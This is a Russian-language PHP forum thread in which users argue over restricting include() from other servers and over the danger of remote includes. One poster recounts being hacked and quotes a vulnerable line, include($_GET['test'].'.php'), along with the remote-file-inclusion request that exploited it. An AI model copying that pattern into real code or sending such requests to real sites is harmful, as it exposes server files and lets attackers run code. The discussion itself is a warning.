настройка INCLUDE

[Vadimka]

настройка INCLUDE

Как запретить доступ с других серверов?

 

[Фанат]

INCLUDE, вообще-то, это доступ с твоего сервера. а не с других.
будь добр, сформулируй вопрос поточнее, и мы расскажем тебе, в чем ты ошибаешься.

 

[Kelkos]

Хех.. я кажется понял, о чём беспокоится человек.. Могу сразу сказать - не парься.. С других серверов если и будет инклюд, то получать он будет не сам скрипт, а только результат его работы.

 

[IBSN]

Kelkos
что юзаешь??? "SELECT * from Vadimka Where telepat_mod='1'" ????

 

[Kelkos]

что юзаешь??? "SELECT * from Vadimka Where telepat_mod='1'" ????

Это ты о чём?

 

[Макс]

Kelkos

С других серверов если и будет инклюд, то получать он будет не сам скрипт, а только результат его работы.

результатом работы скрипта может быть код другого скрипта

 

[Kelkos]

Через include ? Что то верится с трудом.. может где в настройках апача или РНР и есть такой параметр, который отвечает за это, но нет таких хостеров, которые включат этот параметр.
Я тут ради интереса пробывал инклюдить пару сайтов, так вот инклюдится только результат работы скрипта.
-----
Да и вообще, если предположить, что возможен инклюд скрипта со всеми его переменными и пр. то большинство сайтов уже былибы поломаны ламерами недоучками.

 

[Фанат]

сайты, сделанные ламерами- недоучками таки ломают.
только с другой стороны.
а ты этого не понял

 

[Kelkos]

а ты этого не понял

Как сайты ломаются я в курсе, но мы говорим о возможности через include с другого сайта ПОЛУЧИТЬ КОД СКРИПТА!!
А ты этого не понял

 

[IBSN]

Kelkos
хорошо, безопасный режим офф и инклуд к паролю ... Как тебе???

 

[Фанат]

Kelkos
об этом говоришь один ты.
не понимая того, что говорят другие.
другим такие глупости просто не приходит в голову обсуждать.
это для тебя "открытие"!
это тебе надо специально экспериментировать, чтобы узнать.

хотя любому ламеру достаточно прочесть фак на танке, чтобы понять это. без экспериментов.

прочти внимательно, что тебе Максим написал.
он имел в виду не инклюд с чужого сервера, а инклюд со своего.

 

[Kelkos]

И что? хочешь сказать, что это прямо уж такая дырень через которую инклюдом можно таскать скрипты? Н Е В Е Р Ю !
----
Гыы.. вобще то тема была

Как запретить доступ с других серверов?

, но всё равно интересно узнать о потенциальной возможности (если она есть) таскать скрипты.
---------------------------------
Special for ФАНАТ
Ваше мнение меня не интересует.
---------------------------------

 

[IBSN]

Kelkos
Помню меня ламера недоучку поимели...

Читая ФАКИ я категорически игнорировал обработку переменных и вот в один прекрасный момент

include($_GET['test'].".php");

я получил по мозгам таким запросом: index.php?test=http://site.com/hack.php


вообщем в этом файле был fopen и т.п. ну в итоге index.php выдавал содержимое любого файла!!!

 

[Фанат]

Kelkos
тема была - подними глаза кверьху - настройка INCLUDE
а теперь расскажи мне, милый, как ты собрался настраивать INCLUDE на чужих серверах.
ась?

да, в вопросе содержится текст

Как запретить доступ с других серверов?

но с чего ты взял, что речь идет об инклюде, утягивающем исходный код?
А не о чем-то другом.
ну-ка, потрудись объяснить.
а я с удовольствием послушаю.

 

[Kelkos]

To IBSN
Гы.. это уже логические ошибки.. я тоже также попал в первомже скрипте передавая имя файла на вывод.. хех..
Просто я тут как то уже видел репилики типа "Никогда не инклюдь и тем более с другого сайта".. вот и озадачился - может я чего не догоняю?

 

[Фанат]

Никогда не инклюдь

ты не видел, ибо это глупость.

и тем более с другого сайта

ну, если сам сообразить не можешь, что тебе в этот инклюд напихают вредного кода, и ты САМ ЖЕ, своими руками его исполнишь - то тебе ничего уже не поможет.

 

[catoffsky]

Re: настройка INCLUDE

Originally posted by Vadimka
Как запретить доступ с других серверов?

под настройкой include мне ничего не приходит в голову (в меру познания ) , кроме include_path = "path" из php.ini - таким образом ограничиваешь область инклюдов .

ну, если сам сообразить не можешь, что тебе в этот инклюд напихают вредного кода, и ты САМ ЖЕ, своими руками его исполнишь - то тебе ничего уже не поможет.

ну как так напихают - кто ? к примеру: нужно с серьёзного сайта прогноз погоды сливать на свою страничку... разумеется кроме этого сайта (нужной части этого сайта) ничего не может инклюдиться , ибо только его ты и разрешаешь инклюдить... не будем говорить о подмене адресов (я в этом не очень разбираюсь - но могу теоретически представить как это делается) , говоря о безопасности на таком уровне внешние инклюды конечно не допустимы.

 

[Фанат]

таким образом ограничиваешь область инклюдов

садись, ДВА

ну как так напихают - кто

учи матчасть.
или хотя бы прочти это топик внимательно.
но вывод я тебе и так скажу

внешние инклюды конечно недопустимы

ВООБЩЕ НИКОГДА
на любом уровне, чудик.

и меня поражает, что люди, ворующие чужой контент, делают это инклюдом.

не будем говорить о подмене адресов

а поговорим о подмене выдаваемого кода.

 

[catoffsky]

ну вот сразу умяли

садись, ДВА

------
include_path string

Определяет список каталогов где будут располагаться файлы для функций require() , include() и fopen_with_path() . Формат подобен формату системной переменной окружения PATH : список каталогов разделяется двоеточием в UNIX или точкой с запятой в Windows.
------

для чего тогда эта директива предназначена ?
если конечно указывать абсолютные пути - то она не работает ... но удалённо ведь так не сделать?

учи матчасть.

дельный совет ...тем не менее :

или хотя бы прочти это топик внимательно.

чтаю :

Читая ФАКИ я категорически игнорировал обработку переменных и вот в один прекрасный момент

связи с этим (единственным дельным примером) я не вижу так как проверка переменных дело первостепенной важности имхо, но если какие-то (если не все) значения переменных определены заранее (в данном случае это даже не переменное а постоянное значение - путь к одной странице с гарантированным контентом) - то где проблема подмены кода ?

я не мега-спец (не спец вообще и пт - это для исключения толкования моего самомнения ) - поэтому искренне прошу объяснить что конкретно не правильно - так как для меня эта тема на данный момент моего развития что называется животрепещит

 

[Фанат]

для чего тогда эта директива предназначена ?

Определяет список

где здась написано - ОГРАНИЧИВАЕТ?

чтаю :

не там читаешь.
вот что надо читать:

результатом работы скрипта может быть код другого скрипта

который подсунет тебе любой деструктивный пхп код
именно поэтому делать инклюде с ЧУЖНОГО сервера - идиотизм.
я не представляю, как этого можно не понимать
и так долго не понимать.